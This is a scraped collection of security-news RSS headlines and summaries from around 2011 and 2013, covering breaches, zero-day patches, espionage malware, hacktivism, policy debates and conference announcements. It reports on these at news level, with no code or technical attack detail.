==> Kim Dotcom Plans Mega IPO

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN MegaUpload founder, still sought for extradition by the U.S. government, hires CFO to help float his new cloud storage service. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Evernote Breach: 7 Security Lessons

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Both cloud service providers and users should heed the security takeaways from Evernote's breach and response. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Evernote Breach: What It Means To Enterprise IT

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Cloud naysayers will insist that this incident shows why we should never use the cloud. Give me a break. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Kill Passwords: Hassle-Free Substitute Wanted

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Passwords keep proliferating, but do new technologies and approaches offer an alternative? Maybe. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Google+ Social Sign-In Has Pros, Cons

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Google+ Sign-In offers tighter mobile integration and additional controls. But will it allay user fears? Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Anonymous Launches Operation Wall Street, Targets CEOs

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Hacktivist collective cites mortgage crisis, Aaron Swartz and bank spying in call to arms to dox "any and all personal information" on financial services firm executives. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> 5 Lessons From FBI Insider Threat Program

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Use these tips to recognize threats and deter insider theft attempts before they happen. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> FBI Director Stresses Cybercrime Deterrence, Identification

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Robert Mueller cites arrest of LulzSec's 'Sabu' as a prime example of how the FBI is tracking down cybercriminals, in RSA keynote. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Zero Day Java Vulnerability Allows McRat Trojan Infections

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Security experts urge users of latest versions of Java 6 and 7 to disable Java in their browsers until Oracle releases a patch. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Security Tools Show Many Dots, Few Patterns

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Today's security software wastes valuable time by delivering data dumps, rather than focusing on trends. But you can create your own visualizations. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> China Targets U.S. In Hacking Blame Game

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Responding to allegations that China regularly hacks U.S. businesses, Chinese government officials claim that 63% of cyber attacks on their military systems in 2012 came from the U.S. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> MiniDuke Espionage Malware Uses Twitter To Infect PCs

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Online espionage campaign sends malicious PDF documents to victims, and the infected PCs use Twitter to install malware that can copy and delete files. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Anonymous: 10 Things We've Learned In 2013

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The Anonymous hacker group continues to seek equal measures of revenge, justice and reform -- preferably through chaotic means -- for perceived wrongdoings. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Flash Patch, Take Three: Adobe Issues New Fix

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN With attackers actively targeting zero-day flaws in Flash Reader, Adobe has released its third emergency Flash update this month. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Stuxnet Older Than Believed

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Symantec finds earlier version of infamous malware. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> SMS Spam Delivers More Malware, Scams

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Threats are now often disguised as gift offers, product giveaways, and payment protection insurance. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Who Owns Student Data?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN As data collection and data analysis in education grow, so do worries about student and teacher privacy. Is there enough protection? Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back !

http://www.infosecnews.org/isn.rss InfoSec News: Advance Announcement: 2011 ACM Cloud Computing Security Workshop (CCSW) is back !: Forwarded from: noreply (at) crypto.cs.stonybrook.edu 2011 ACM Cloud Computing Security Workshop (CCSW) at CCS October 21, 2011, SWISSOTEL Chicago http://crypto.cs.stonybrook.edu/ccsw11 Dear Colleagues, CCSW is back! The past workshops were a tremendous success, with over [...]

==> Unfollowed: How a (Possible) Social Network Spy Came Undone

http://www.infosecnews.org/isn.rss InfoSec News: Unfollowed: How a (Possible) Social Network Spy Came Undone: http://www.wired.com/dangerroom/2011/04/unfollowed-how-a-possible-social-network-spy-came-undone/ [When the early information about this story was coming out, it was that @PrimorisEra might have been spotting and assessing targets for a KGB honey pot operation. [...]

==> US-Russian dictionary defines cyber war, other concepts

http://www.infosecnews.org/isn.rss InfoSec News: US-Russian dictionary defines cyber war, other concepts: http://gcn.com/articles/2011/04/28/us-russia-cyber-dictionary.aspx By William Jackson GCN.com April 28, 2011 It is all very well to talk about cyberspace and cybersecurity, but what do they mean, exactly? A U.S.-Russian effort is proposing common definitions. [...]

==> ICANN taps DefCon founder for top security spot

http://www.infosecnews.org/isn.rss InfoSec News: ICANN taps DefCon founder for top security spot: http://www.v3.co.uk/v3-uk/news/2046681/icann-taps-defcon-founder-security-spot By Shaun Nichols V3.co.uk 29 Apr 2011 The Internet Corporation for Assigned Names and Numbers (ICANN) has named Jeff Moss as its new chief security officer. A security expert and respected member of the hacking community, Moss is best known for his roles in founding the DefCon and Black Hat security conferences. He has also worked in advisory positions for the US Department of Homeland Security. The appointment of Moss will bring to ICANN a security head who is well-versed in the attitudes and techniques which have driven research in both security intrusions and detections in recent years. The hiring also comes at a time when ICANN and other internet governance groups are working to roll out security measures such as DNSSEC. [...]

==> Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools

http://www.infosecnews.org/isn.rss InfoSec News: Teacher Passwords Stolen, Grades Hacked At 3 Seattle High Schools: http://www.kirotv.com/education/27708043/detail.html By kirotv.com Webstaff April 28, 2011 SEATTLE -- Someone has stolen teacher passwords and changed grades in a Seattle Public Schools computer system, the district said in an email to teachers obtained Thursday by KIRO 7 Eyewitness News. [...]

==> Cyberespionage: US finds FBI agents in elite unit lack necessary skills

http://www.infosecnews.org/isn.rss InfoSec News: Cyberespionage: US finds FBI agents in elite unit lack necessary skills: Forwarded from: Justin Lundy <jbl (at) tegataiphoenix.com> http://www.csmonitor.com/USA/2011/0427/Cyberespionage-US-finds-FBI-agents-in-elite-unit-lack-necessary-skills By Mark Clayton Staff writer The Christian Science Monitor April 27, 2011 Many of the Federal Bureau of Investigation's field agents assigned to an elite cyber investigative unit lack the skills needed to investigate cases of cyberespionage and other computerized attacks on the US, the Justice Department inspector general reported Wednesday. That's a problem because the US is under constant and increasing cyberattack with 5,499 known intrusions into US government computer systems in 2008 alone -- a 40 percent jump from 2007, the inspector general's office found. Investigating these kinds of cyberespionage attacks falls largely on the FBI as the lead agency for the National Cyber Investigative Joint Task force, which also includes representatives from 18 different intelligence agencies and is assigned to investigate the most difficult national security intrusions -- those by a foreign power for intelligence gathering or terrorist purposes. But in interviews with 36 field agents in 10 of the FBI's 56 field offices nationwide, 13 agents, or more than a third, "reported that they lacked the networking and counterintelligence expertise to investigate national security [computer] intrusion cases." Five of the agents told investigators "they did not think they were able or qualified" to investigate such cases, the report said. The inspector general report does not indicate whether the 36 field agents who were interviewed are a representative sampling of the FBI’s cyber unit. [...]

==> Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College

http://www.infosecnews.org/isn.rss InfoSec News: Experts dissect hacker attacks during cybersecurity forum at Hagerstown Community College: http://www.herald-mail.com/news/local/hm-cyber-experts-dissect-hacker-attacks-during-cybersecurity-forum-at-hagerstown-community-college-20110427,0,2996601.story By ANDREW SCHOTZ herald-mail.com April 27, 2011 Experts Wednesday detailed simple and complex ways to protect computers [...]

==> Are we talking "cyber war" like the Bush admin talked WMDs?

http://www.infosecnews.org/isn.rss InfoSec News: Are we talking "cyber war" like the Bush admin talked WMDs?: http://arstechnica.com/security/news/2011/04/are-we-talking-cyber-war-like-the-bush-admin-talked-wmds.ars By Matthew Lasar Ars Technica April 27, 2011 Turn any corner in the complex metropolis that is Internet policy and you'll hear about the "cybersecurity" crisis in two nanoseconds. [...]

==> Oracle hedging its vulnerability reports?

http://www.infosecnews.org/isn.rss InfoSec News: Oracle hedging its vulnerability reports?: http://www.computerworld.com/s/article/9216213/Oracle_hedging_its_vulnerability_reports_ By Joab Jackson IDG News Service April 27, 2011 Oracle may be subtly misleading customers about the severity of some of the vulnerabilities found in its database software, according to [...]

==> PlayStation credit card data was encrypted

http://www.infosecnews.org/isn.rss InfoSec News: PlayStation credit card data was encrypted: http://www.zdnet.com.au/playstation-credit-card-data-was-encrypted-339314012.htm By Darren Pauli ZDNet.com.au April 28th, 2011 Sony has confirmed that the credit card details possibly stolen in a breach of its PlayStation Network (PSN) were encrypted. [...]

==> Phone-hacking laws are 'very uneven and unclear'

http://www.infosecnews.org/isn.rss InfoSec News: Phone-hacking laws are 'very uneven and unclear': http://www.guardian.co.uk/media/2011/apr/26/phone-hacking-laws-christopher-graham By James Robinson guardian.co.uk 26 April 2011 The information commissioner has told a powerful group of MPs that legislation outlawing phone hacking is "very uneven" and "very unclear" [...]

==> USENIX WOOT '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: USENIX WOOT '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 5th USENIX Workshop on Offensive Technologies (WOOT '11) is approaching. Please submit all work by May 2, 2011, at 11:59 p.m. PDT. [...]

==> USENIX HotSec '11 Submission Deadline Extended

http://www.infosecnews.org/isn.rss InfoSec News: USENIX HotSec '11 Submission Deadline Extended: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> I'm writing to remind you that the submission deadline for the 6th USENIX Workshop on Hot Topics in Security has been extended. Please submit all work by 11:59 p.m. EST on May 12, 2011. HotSec takes a broad view of security and privacy and encompasses research on new security ideas and problems. Cross-discipline papers identifying new security problems or exploring approaches not previously applied to security will be given special consideration. All submissions should propose new directions of research, advocate non-traditional approaches, report on noteworthy experience in an emerging area, or generate lively discussion around an important topic. Topics of interest include, but are not limited to the following: * Large-scale threats * Network security * Hardware security * Software security * Physical security * Programming languages * Applied cryptography * Privacy * Human-computer interaction * Emerging computing environment * Sociology * Economics Attendance will be limited to 35-50 participants, with preference given to the authors of accepted position papers/presentations. Submission guidelines and more information can be found at http://www.usenix.org/hotsec11/cfpb HotSec '11 will take place Tuesday, August 9, 2011, in San Francisco, CA. It is co-located with the 20th USENIX Security Symposium, which will take place August 10-12, 2011. We look forward to your submissions. Patrick McDaniel, Pennsylvania State University HotSec '11 Program Chair hotsec11chair (at) usenix.org

==> Court order cripples Coreflood botnet, says FBI

http://www.infosecnews.org/isn.rss InfoSec News: Court order cripples Coreflood botnet, says FBI: http://www.computerworld.com/s/article/9216190/Court_order_cripples_Coreflood_botnet_says_FBI By Gregg Keizer Computerworld April 26, 2011 Although the Federal Bureau of Investigation (FBI) said a federal temporary restraining order has crippled the Coreflood botnet in the U.S. [...]

==> China Implicated In Hacking Of SMB Online Bank Accounts

http://www.infosecnews.org/isn.rss InfoSec News: China Implicated In Hacking Of SMB Online Bank Accounts: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229402294/china-implicated-in-hacking-of-smb-online-bank-accounts.html By Kelly Jackson Higgins Darkreading April 26, 2011 This time it wasn't an "advanced persistent threat" associated with [...]

==> Is Iran just seeing Stars?

http://www.infosecnews.org/isn.rss InfoSec News: Is Iran just seeing Stars?: http://www.csoonline.com/article/680599/is-iran-just-seeing-stars- By Robert Lemos CSO April 26, 2011 An Iranian official caused a stir Monday, claiming the nation's cybersecurity experts found another digital attack aimed at the Islamic country's systems. [...]

==> Police: Wireless network hacker targeted Seattle-area businesses

http://www.infosecnews.org/isn.rss InfoSec News: Police: Wireless network hacker targeted Seattle-area businesses: http://www.seattlepi.com/local/article/Police-Wireless-network-hacker-targeted-1344185.php By LEVI PULKKINEN SEATTLEPI.COM STAFF April 19, 2011 Law officers have moved to seize a Seattle man's car they claim was used in a "wardriving" spree that saw Seattle-area wireless networks hacked [...]

==> New Workshop: USENIX FOCI '11 Submission Deadline Approaching

http://www.infosecnews.org/isn.rss InfoSec News: New Workshop: USENIX FOCI '11 Submission Deadline Approaching: Forwarded from: Lionel Garth Jones <lgj (at) usenix.org> We're writing to remind you that the submission deadline for the first USENIX Workshop on Free and Open Communications on the Internet (FOCI '11) is approaching. Please submit your work by May 1, 2011, at 11:59 p.m. PDT. http://www.usenix. [...]

==> The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures

http://www.infosecnews.org/isn.rss InfoSec News: The Rising Tide Of Cyber-Threats Could Engulf National Infrastructures: http://www.eweekeurope.co.uk/comment/the-rising-tide-of-cyber-threats-could-engulf-national-infrastructures-27457 By Eric Doyle eWEEK Europe April 25, 2011 Cyber-attacks are increasing but national infrastructures are ill-prepared to defend themselves. [...]

==> DHS chief: What we learned from Stuxnet

http://www.infosecnews.org/isn.rss InfoSec News: DHS chief: What we learned from Stuxnet: http://www.computerworld.com/s/article/9216166/DHS_chief_What_we_learned_from_Stuxnet By Robert McMillan IDG News Service April 25, 2011 If there's a lesson to be learned from last year's Stuxnet worm, it's that the private sector needs to be able to respond quickly to [...]

==> Dataloss Weekly Week of Sunday, April 17, 2011

http://www.infosecnews.org/isn.rss InfoSec News: Dataloss Weekly Week of Sunday, April 17, 2011:
Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, April 17, 2011 45 Incidents Added.
[...]

==> Phishing: Consumer Education Lacking

http://www.infosecnews.org/isn.rss InfoSec News: Phishing: Consumer Education Lacking: http://www.bankinfosecurity.com/articles.php?art_id=3571 By Tracy Kitten Managing Editor Bank Info Security April 22, 2011 The Oak Ridge National Laboratory, located in Tennessee, recently disconnected Internet access after hackers attacked employees at the federal facility. [...]

==> 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems

http://www.infosecnews.org/isn.rss InfoSec News: 2nd CfP: CRiSIS 2011: Risks and Security of Internet and Systems: Forwarded from: Marius Minea <marius (at) cs.upt.ro> CALL FOR PAPERS [ PDF version at: http://crisis2011.cs.upt.ro/CRiSIS2011-CfP.pdf ] The Sixth International Conference on Risks and Security of Internet and Systems CRiSIS 2011 Timisoara, Romania, 26-28 September 2011 [...]

==> Phishing Attack Hits Oak Ridge National Laboratory

http://www.infosecnews.org/isn.rss InfoSec News: Phishing Attack Hits Oak Ridge National Laboratory: http://www.informationweek.com/news/government/security/229402048 By Elizabeth Montalbano InformationWeek April 21, 2011 The Department of Energy's Oak Ridge National Laboratory is investigating a sophisticated phishing attack that forced it to shut down email and Internet access last week. [...]

==> Spain to welcome the new Industrial Cybersecurity Center

http://www.infosecurity-magazine.com/rss/news/ Spain is addressing vulnerabilities in the cyber-hardiness of its critical information and communication technologies with the upcoming launch of the Industrial Cybersecurity Center (ICC).

==> Identity theft tops list of FTC complaints – again

http://www.infosecurity-magazine.com/rss/news/ There are lots of things to complain to the US Federal Trade Commission about gas prices and financial lending practices spring to mind but it turns out that, for the 13th year in a row, identity theft complaints top the list of things that US consumers want to pick a bone about.

==> Oracle patches two Java zero-day exploits

http://www.infosecurity-magazine.com/rss/news/ Oracle has released an out-of-cycle emergency patch for Java to address two zero-day vulnerabilities, including a recently reported issue that allows hackers to download the McRAT remote access trojan. This is the fifth Java update so far in 2013.

==> Samsung Android devices vulnerable to lockscreen bypass

http://www.infosecurity-magazine.com/rss/news/ Hard on the heels of Apple iPhone lock screen bypass woes, it turns out that Samsung devices running Android version 4.1.2 have a similar bug, which allows someone to get around the screen lock.

==> Companies failing to get a grip on BYOD

http://www.infosecurity-magazine.com/rss/news/ A new survey shows that companies with a BYOD policy suffer virtually the same number of BYOD security incidents as those with no policy at all just a 5% improvement.

==> RSA 2013: Security is not keeping pace with threats

http://www.infosecurity-magazine.com/rss/news/ A survey of attendees at last weeks RSA Conference shows that security professionals understand the changing threatscape, but that organizations are not necessarily keeping up with adequate defenses.

==> Trolling – academics look at an online sub-culture that verges on bullying

http://www.infosecurity-magazine.com/rss/news/ A new study by Nottingham Trent University suggests that nearly 60% of online gamers have at some stage indulged in activity described by the university as intentionally provoking or antagonizing users in an online environment that is, trolling.

==> House, Obama Administration nearing an agreement on CISPA

http://www.infosecurity-magazine.com/rss/news/ US House of Representatives Intelligence Committee Chairman Mike Rogers (R-Mich.) said that his committees negotiations with the White House on a new cybersecurity bill have resumed, with a draft for markup on target to appear in April.

==> Apple blacklists older versions of Adobe Flash

http://www.infosecurity-magazine.com/rss/news/ Apple has made the move to proactively block older versions of Adobe Flash Player in Safari and the Mac OS in the wake of an Adobe security advisory last week.

==> Newspapers more aggressive in demands for a share of search profits

http://www.infosecurity-magazine.com/rss/news/ German lawmakers have approved a bill aimed at protecting publishers copyright while New Yorks Associated Press is suing California-based Meltwater (a media monitoring company) in the US.

==> New survey suggests face-to-face is more important than technology for bank customers

http://www.infosecurity-magazine.com/rss/news/ A YouGov survey of more than 6500 people in France (1010), Germany (1053), Hong Kong (518), Spain (1006), the USA (1000) and the UK (2060) suggests that bank customers favor access to a local branch above technology such as mobile banking and social network banking.

==> China claims US-based hackers constantly target its assets

http://www.infosecurity-magazine.com/rss/news/ After a string of high-profile hacks on media sites and technology companies have had security researchers pointing the finger strongly in the direction of the Chinese military, Beijing has decided to turn the tables with a few accusations of its own.

==> Dropbox users wrestling with spam – again

http://www.infosecurity-magazine.com/rss/news/ Dropbox users have apparently become the target of a spam campaign, which is possibly a vestige of the data breach that the file-sharing service experienced last July.

==> Evernote hacked; 50 million passwords reset

http://www.infosecurity-magazine.com/rss/news/ Evernote, an online personal note-taking and archiving service, announced on Saturday that it had discovered and blocked suspicious activity on the Evernote network, and had consequently initiated a password reset for its 50 million users.

==> Stuxnet has been attacking Iran since 2005

http://www.infosecurity-magazine.com/rss/news/ The Stuxnet malware used to take Iran's nuclear program offline in 2009/2010 is actually two years older than previously thought.

==> YAJ0 – yet another Java zero-day

http://www.infosecurity-magazine.com/rss/news/ Researchers have discovered yet another Java zero-day vulnerability being successfully exploited in the wild against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.

==> New setback for Dotcom in his fight against extradition to the US

http://www.infosecurity-magazine.com/rss/news/ In a relatively rare victory in its attempts to get Kim Dotcom extradited from New Zealand to face charges including copyright, racketeering, and money laundering, the US authorities have won their appeal against full disclosure of evidence.

==> Additional research also points the finger at China

http://www.infosecurity-magazine.com/rss/news/ A new paper presented at the RSA Conference in San Francisco this week adds further evidence to the growing belief that China is the source of a large amount of APT cyber espionage against the West.

==> Security framework looks to better secure hotel credit card data

http://www.infosecurity-magazine.com/rss/news/ In an effort to reduce the vulnerability of customer payment card information within the hotels and hospitality environment, Hotel Technology Next Generation (HTNG) has introduced a collaborative effort by the worlds major hotel groups to create a security framework so that no hotel system would ever need to process, store or transmit payment card data.

==> Use a strong password and encrypt your phone, warns the ACLU

http://www.infosecurity-magazine.com/rss/news/ For once, however, this is not good advice to defeat hackers and phone thieves, but advice on how to protect personal data from law enforcements warrantless phone searches.

==> ISF Threat Horizon 2015 Report: The findings

http://www.infosecurity-magazine.com/rss/news/ But one new and emerging threat for business is reputation cyber breaches dont merely lose data, the associated loss of reputation reduces corporate share value.

==> Par:AnoIA leaks 14 GB of data from Bank of America

http://www.infosecurity-magazine.com/rss/news/ Par:AnoIA (Potentially Alarming Research from the Anonymous Intelligence Agency) has released 14 GB of data that it claims was lifted from the Bank of America.

==> RSA 2013: Barracuda Ventures Launched to Fuel Startup and Technology Innovation

http://www.infosecurity-magazine.com/rss/news/ At the RSA Conference in San Francisco, Barracuda Networks has announced the launch of Barracuda Ventures, an initiative that supports startups with technology, capital, and mentorship.

==> Android spambot, blended threats top mobile spam threats in 2013

http://www.infosecurity-magazine.com/rss/news/ Mobile users are increasingly likely to be spammed. New research has revealed there were more than 350,000 unique unsolicited mobile spam variants in 2012, with the highest churn rate in December with more than 53,000 unique variants alone.

==> MiniDuke responsible for political cyber espionage in 23 countries

http://www.infosecurity-magazine.com/rss/news/ Government officials in more than 20 countries are feeling the effects of an Adobe-based exploit that hackers have used to drop the MiniDuke malware, tasked with stealing intelligence from political targets.

==> RSA 2013: CSA provides legal resources for cloud computing; issues list of top threats

http://www.infosecurity-magazine.com/rss/news/ The Cloud Security Alliance has announced several initiatives at this weeks RSA Conference in San Francisco that range from privacy issues, legal information, and major threats relevant to the cloud security landscape.

==> NIST opens discussion on critical infrastructure security framework

http://www.infosecurity-magazine.com/rss/news/ In a move to bolster its quest to develop a set of voluntary standards and best practices for reducing cyber risks to critical infrastructure, the US National Institute of Standards and Technology (NIST) has issued a request for information (RFI) in the Federal Register.

==> FBI’s LulzSec informant Sabu gets second stay of execution

http://www.infosecurity-magazine.com/rss/news/ Hector Monsegur aka Sabu, the former LulzSec leader turned FBI informant was expected to be sentenced on Friday following a six month reprieve. It didnt happen; instead he got a further six months reprieve.

==> New emergency bug fixes for Adobe Flash

http://www.infosecurity-magazine.com/rss/news/ Adobe has released a new emergency out-of-band patch for Flash the third Flash update this month and the fourth this year fixing two vulnerabilities currently being exploited against Firefox, and a third vulnerability that could potentially be exploited.

==> RSA 2013: The grey area of active defense – live manipulation of Kelihos

http://www.infosecurity-magazine.com/rss/news/ A live demonstration of active defense at RSA this week highlights the current debate on just how active (for which read offensive) companies can be in defending their networks. Laws to prevent hacking may also protect the hackers.

==> RSA 2013: Interview with security evangelist Stephen Cobb

http://www.infosecurity-magazine.com/rss/news/ Infosecurity Editor, Eleanor Dallaway, spent a fascinating 45 minutes picking the brain of ESET security evangelist, Stephen Cobb at RSA in San Francisco.

==> RSA 2013: Malicious data breaches result in significantly higher costs

http://www.infosecurity-magazine.com/rss/news/ New research from the Ponemon Institute confirms what many already suspected: malicious data breaches are far more costly than unintentional ones, to the tune of a 78% cost mark-up.

==> RSA 2013: Compliance Equals False Sense of Security, Says Vormetric

http://www.infosecurity-magazine.com/rss/news/ Compliance is responsible for a false sense of security, Alan Kessler, President & CEO, Vormetric, told Infosecurity at the RSA Conference in San Francisco, February 26 2013.

==> RSA 2013: Aadhaar, the Indian Electronic Identity Scheme, will change lives, says RSA keynote presenter

http://www.infosecurity-magazine.com/rss/news/ During the keynote sessions at the RSA conference in San Francisco today, Srikanth Nadhamuni, Head of Technology at UID Authority of India and CEO at Khosla Labs, presented Aadhaar, the identity scheme in India.

==> RSA 2013: Big Data has power to transform security, says RSA chairman

http://www.infosecurity-magazine.com/rss/news/ During his opening keynote at this years RSA Conference in San Francisco, RSA chairman Art Coviello called 2012 a breakthrough year for the concept of Big Data, and then laid down his vision of how it can be leveraged to promote greater security.

==> Encryption has become a strategic rather than IT issue

http://www.infosecurity-magazine.com/rss/news/ The 2012 Global Encryption Trends Study, which surveyed 4,205 people in 7 different countries shows that in the US it is business leaders rather than IT departments that are now the more influential group in setting the enterprise encryption strategy.

==> Technology moves to make cloud synchronization / storage secure

http://www.infosecurity-magazine.com/rss/news/ One of the most worrying security concerns to come out of the growth of cloud computing and BYOD has been the extensive adoption of third-party file synchronization services, typified by Dropbox and Box, but also including other cloud services such as Drive and SkyDrive.

==> Six Strikes started to roll out yesterday

http://www.infosecurity-magazine.com/rss/news/ The Copyright Alert System CAS better known as six strikes finally started its 'implementation phase' on Monday 25 February 2013. It is designed, say its operators, to reduce casual piracy on the internet.

==> RSA 2013: McAfee Announces Acquisition and Updates to Enhance Malware Protection

http://www.infosecurity-magazine.com/rss/news/ At the McAfee press conference in San Franciso, on the first day of the RSA Conference 2013, McAfee announced the acquisition of ValidEdge and 38 malware-focussed updates to its anti-malware portfolio.

==> RSA 2013: As cybersecurity receives more attention, DHS becomes a critical player

http://www.infosecurity-magazine.com/rss/news/ With media coverage of cyber attacks proliferating, and public sector policy shops giving security increasing attention, the US Department of Homeland Security finds itself at the front lines of securing the nations digital assets.

==> Congressman urges pasage of the GRID Act

http://www.infosecurity-magazine.com/rss/news/ The Grid Reliability and Infrastructure Defense (GRID) Act is slowly gaining support in the US Congress, most recently from Representative Ed Markey (D-Mass.).

==> Big data analytics for anomaly detection in security

http://www.infosecurity-magazine.com/rss/news/ Big data analytics first evolved for use in marketing: by understanding the relationships between customers and actions, better marketing can be developed. Now the practice is being applied to security: by understanding the relationship between network anomalies and events, better security will evolve.

==> NBC hack serves Citadel malware to visitors

http://www.infosecurity-magazine.com/rss/news/ NBC has become the latest high-profile target for a cyber-attack, with its website, NBC.com, becoming compromised by the Citadel financial malware kit long enough to start serving malware to visitors before being corrected.

==> Chrome 25 stable channel released ahead of Pwn2Own

http://www.infosecurity-magazine.com/rss/news/ Googles Chrome 25 browser has now been promoted from beta to the full stable channel, fixing nine high severity vulnerabilities in the process. Chrome, Firefox and Internet Explorer have now all had major security overhauls during February.

==> Latest (ISC)2 Workforce Study Shows Lack of Skilled Infosec Professionals and Developers

http://www.infosecurity-magazine.com/rss/news/ The problem is that not enough skilled people actually get into the profession; and all too often security is deemed to be separate from software development. These are the key findings of the sixth and latest study among the existing global security workforce conducted by (ISC)2, Booz Allen Hamilton and Frost and Sullivan.

==> UK users say regulators should be more proactive against Google’s privacy policy

http://www.infosecurity-magazine.com/rss/news/ On the eve of a meeting of the EU national privacy regulators (the Article 29 Working Party) in Brussels, a new survey suggests that two-thirds of UK users believe that more should be done to force Google to comply with European data protection laws.

==> Government maintians poor governance, concludes a new survey

http://www.infosecurity-magazine.com/rss/news/ A new survey of attitudes about information security within 277 UK public sector organizations, including the NHS, local councils, universities, trusts, central government and the police, highlights what can only be described as a lax attitude toward data security.

==> Nearly two-thirds of organizations are already infected with bots

http://www.infosecurity-magazine.com/rss/news/ 70% of those infections communicate with their C&C servers at least once every two hours, and more than half of organizations across the globe have had malware downloaded onto their networks via these bots.

==> Attacks are evolving; but organizations’ deployed defenses are not

http://www.infosecurity-magazine.com/rss/news/ Although the most serious security threat has evolved from mass random attacks to a specific, targeted and persistent attack, the majority of companies have not evolved their defenses many are still reliant on the old traditional security that was never designed to combat the modern APT.

==> Sophisticated banking threats branch out to other sectors – and get smarter

http://www.infosecurity-magazine.com/rss/news/ Sophisticated cyber-attacks originally targeting the financial services industry are now increasingly directed at other critical sectors of the economy, a new threat report finds, adding that there is also fresh cause for concern: the attackers are getting smarter.

==> New e-shop hawks stolen PayPal accounts

http://www.infosecurity-magazine.com/rss/news/ Hacked PayPal credentials are up for sale in the cybercriminal underworld, arranged in a fast and convenient e-shop format.

==> Cloud adoption is increasing, but privacy and security concerns remain

http://www.infosecurity-magazine.com/rss/news/ While enterprises overall are much more confident in the cloud than they were 12 months ago, security and privacy concerns continue to hold many back from widespread adoption of the model, according to a new survey of 200 US CIOs and senior level security decision-makers. On average though, respondents have moved about one-quarter of all their business functions and services to the cloud.

==> The car of the future will be recording everything you do

http://www.infosecurity-magazine.com/rss/news/ A very public row between the New York Times motor correspondent John Broder and Tesla Motors is entertaining motor enthusiasts and worrying privacy advocates. The NYT delivered a negative review, but Tesla had logged every part of the test drive.

==> European Parliament industry committee backs the EC’s Data Protection Regulation

http://www.infosecurity-magazine.com/rss/news/ While the EC has welcomed the opinion of parliaments industry, research and energy committee (ITRE) as the latest step towards a swift adoption of the proposed legislation, it is nevertheless not a complete endorsement. It rejects mandatory fines.

==> New report claims potential cost of a loss of trust is $400 million

http://www.infosecurity-magazine.com/rss/news/ The first in a new series of annual reports seeking to quantify the cost of trust more specifically the loss of trust suggests that global 2000 companies can expect a breach of trust to cost almost $400 million.

==> European Commission awards biometrics, data exchange contract for border control

http://www.infosecurity-magazine.com/rss/news/ The European Commission has awarded a 70m contract to a consortium led by Accenture for maintaining the European Visa Information System for the exchange of visa alphanumeric and biometric data across EU border management authorities.

==> Educause hit with server-side data breach

http://www.infosecurity-magazine.com/rss/news/ Educause, a non-profit community for IT professionals focused on the higher education vertical, is warning that a data breach has affected its 1,800 college and 300 corporate members.

==> 5 more critical fixes for Java released by Oracle

